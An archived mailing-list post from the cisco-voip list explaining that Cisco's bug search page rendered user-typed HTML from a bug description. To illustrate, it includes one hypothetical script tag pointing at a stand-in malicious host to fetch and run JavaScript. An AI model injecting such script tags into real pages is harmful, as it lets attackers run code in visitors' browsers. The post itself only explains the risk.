[cisco-voip] Bug Search Code Injection

Anthony Holloway avholloway+cisco-voip at gmail.com
Tue Aug 20 13:53:42 EDT 2019

Basically someone typed in some HTML code into the bug description, and
when my browser received/rendered the page content, my browser saw this
code as code it needed to execute, hence the <textarea> text box was
rendered as opposed to the text "<textarea>" just being shown on the page
(like how it is in the title.

Now, while this page is not doing anything harmful at the moment, it's not
impossible for the code to have been:

<script>https://myharmfulwebsite.com/code-you-dont-want.js</script>

Then my browser would have downloaded and executed that.

I'm no hacker, but I know this can't be good.

Also, if nothing else, it ruins the value of the bug itself, because people
like you don't know what the hell it's trying to tell you.  Know what I
mean man?